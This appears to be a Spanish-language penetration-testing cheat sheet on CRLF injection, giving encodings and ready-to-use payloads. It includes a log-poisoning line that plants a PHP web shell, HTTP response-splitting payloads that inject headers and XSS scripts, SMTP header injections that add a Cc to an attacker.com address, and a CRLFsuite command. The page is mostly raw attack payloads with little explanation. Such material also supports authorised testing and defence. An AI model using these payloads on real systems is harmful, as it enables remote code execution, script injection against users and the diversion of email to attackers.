CRLF injection

Descripción

Carácter

ASCII (Dec)

Hex

URL Encoded

Carriage Return (CR)

0x0D

%0D

Line Feed (LF)

0x0A

%0A

CRLF

\r\n

13 10

0x0D0A

%0D%0A

Log injection

# Log poisoning
%0D%0A<?php system($_GET['cmd']); ?>

HTTP response splitting

# HTTP header
%0D%0AHeader-Test: value-test
# XSS
%0D%0A%0D%0A<html><script>alert(1)</script></html>
# HTTP header Content-Type + XSS
%0D%0AContent-Type: text/html%0D%0A%0D%0A<html><script>alert(1)</script></html>

SMTP header injection

# SMTP header
%0D%0AHeader-Test: value-test
## URL encoder
%0D%0AHeader-Test:+value-test

# SMTP header Cc
%0D%0ACc: [email protected]
%0D%0ACc: [email protected]%0D%0ADoesNotExist: True
## URL encoder
%0D%0ACc:+email%40attacker.com
%0D%0ACc:+email%40attacker.com%0D%0ADoesNotExist:+True

Herramientas

CRLFsuite

https://github.com/Raghavd3v/CRLFsuite

crlfsuite -t http://<target>/param1=value1&param2=value2

AnteriorXML external entity (XXE) injection SiguienteXPath injection

Última actualización hace 1 año

hashtagLog injection

hashtagHTTP response splitting

hashtagSMTP header injection

hashtagHerramientas

hashtagCRLFsuite

Log injection

HTTP response splitting

SMTP header injection

Herramientas

CRLFsuite